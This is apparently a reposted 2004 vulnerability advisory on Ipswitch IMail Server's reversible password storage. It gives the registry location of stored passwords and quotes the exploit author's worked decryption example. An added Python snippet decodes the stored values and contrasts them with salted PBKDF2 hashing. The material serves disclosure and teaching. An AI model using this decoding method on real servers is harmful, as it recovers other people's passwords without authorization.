IpSwitch IMail Server Weak Encryption Algorithm Vulnerability

2008-04-09 04:27:46 Source: Internet


Published: 2004-08-16
Updated: 2004-08-18

Affected systems:
Ipswitch IMail 8.1
Ipswitch IMail 8.0.5
Ipswitch IMail 8.0.3
Description:
BUGTRAQ ID: 10956

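Ipswitch IMail Server is a web-based mail solution.

IpSwitch IMail Server encrypts user passwords with a weak encryption algorithm; a local attacker can exploit this to recover password information.

IpSwitch IMail Server encrypts user passwords with a 'polyalphabetic Vigenere cipher'. This mechanism is easy to break: decrypting a user's password requires a key, and IMail uses the username as the key when encrypting that user's password. User password information is stored in the registry under: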

"HKEY_LOCAL_MACHINE\SOFTWARE\IpSwitch\IMail\Domains\<domainname>\Users\<username>\Password"

Before decrypting the password, all upper-case letters in the username must be converted to lower case.

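<*Source: Adik (netmaniac@hotmail.KG)

Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109270420221701&w=2
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Adik (netmaniac@hotmail.KG) provided the following test method: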

/*************************************************************************************************
* IpSwitch IMail Server <= ver 8.1 User Password Decryption
*
* by Adik < netmaniac[at]hotmail.KG >
*
* IpSwitch IMail Server uses weak encryption algorithm to encrypt its user passwords. It uses
* polyalphabetic Vigenere cipher to encrypt its user passwords. This encryption scheme is
* relatively easy to break. In order to decrypt user password we need a key. IMail uses username
* as a key to encrypt its user passwords. The server stores user passwords in the registry under the key
* "HKEY_LOCAL_MACHINE\SOFTWARE\IpSwitch\IMail\Domains\<domainname>\Users\<username>\Password".
* Before decrypting password convert all upper case characters in the username to lower case
* characters. We use username as a key to decrypt our password.
* In order to get our plain text password, we do as follows:
* 1) Subtract hex code of first password hash character by the hex code of first username character.
* The resulting hex code will be our first decrypted password character.
* 2) Repeat above step for the rest of the chars.
*
* Look below, everything is dead simple ;)
* eg:
*
* USERNAME: netmaniac
* PASSWORDHASH: D0CEE7D5CCD3D4C7D2E0CAEAD2D3
* --------------------------------------------
*
* D0 CE E7 D5 CC D3 D4 C7 D2 E0 CA EA D2 D3 <- password hash
* - 6E 65 74 6D 61 6E 69 61 63 6E 65 74 6D 61 <- hex codes of username
* n e t m a n i a c n e t m a <- username is a key
* -----------------------------------------
* 62 69 73 68 6B 65 6B 66 6F 72 65 76 65 72 <- hex codes of decrypted password
* b i s h k e k f o r e v e r <- actual decrypted password
*
*
* pwdhash_hex_code username_hex_code decrypted_password
* ------------------------------------------------------------------
* D0 - 6E (n) = 62 (b)
* CE - 65 (e) = 69 (i)
* E7 - 74 (t) = 73 (s)
* D5 - 6D (m) = 68 (h)
* CC - 61 (a) = 6B (k)
* D3 - 6E (n) = 65 (e)
* D4 - 69 (i) = 6B (k)
* C7 - 61 (a) = 66 (f)
* D2 - 63 (c) = 6F (o)
* E0 - 6E (n) = 72 (r)
* CA - 65 (e) = 65 (e)
* EA - 74 (t) = 76 (v)
* D2 - 6D (m) = 65 (e)
* D3 - 61 (a) = 72 (r)
* ------------------------------------------------------------------
*
* I've included a lil proggie to dump all the usernames/passwords from local machine's registry.
* Have fun!
* //Send bug reports to netmaniac[at]hotmail.KG
*
* Greets to: my man wintie from .au, Chintan Trivedi :), jin yean ;), Morphique
*
* [16/August/2004] Bishkek
**************************************************************************************************/
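
The storage scheme described above, as an added example (not code from the advisory or from Adik): it reproduces the advisory's worked sample to show that the stored value is reversible by anyone who knows the username, next to a salted PBKDF2 record that is not. The byte wrap-around modulo 256, the function names and the PBKDF2 parameters are assumptions of this example.

```python
import hashlib
import hmac
import os
from itertools import cycle


def imail_encode(username: str, password: str) -> str:
    """Weak scheme from the advisory: password byte + lowercased-username byte."""
    key = username.lower().encode("latin-1")
    data = password.encode("latin-1")
    # Assumption: sums wrap modulo 256 (the advisory's sample never overflows).
    return bytes((p + k) % 256 for p, k in zip(data, cycle(key))).hex().upper()


def imail_decode(username: str, stored_hex: str) -> str:
    """Inverse of imail_encode: the only 'secret' is the public username."""
    key = username.lower().encode("latin-1")
    data = bytes.fromhex(stored_hex)
    return bytes((c - k) % 256 for c, k in zip(data, cycle(key))).decode("latin-1")


def hardened_store(password: str, iterations: int = 600_000):
    """One-way alternative: random per-user salt plus PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest


def hardened_verify(password: str, record) -> bool:
    """Recompute the digest and compare in constant time; nothing is decrypted."""
    salt, iterations, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    # Sample username and stored value taken from the advisory's worked example.
    user, stored = "netmaniac", "D0CEE7D5CCD3D4C7D2E0CAEAD2D3"
    print("weak scheme reverses to:", imail_decode(user, stored))
    record = hardened_store("bishkekforever")
    print("hardened record verifies:", hardened_verify("bishkekforever", record))
    print("hardened digest (not reversible):", record[2].hex())
```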
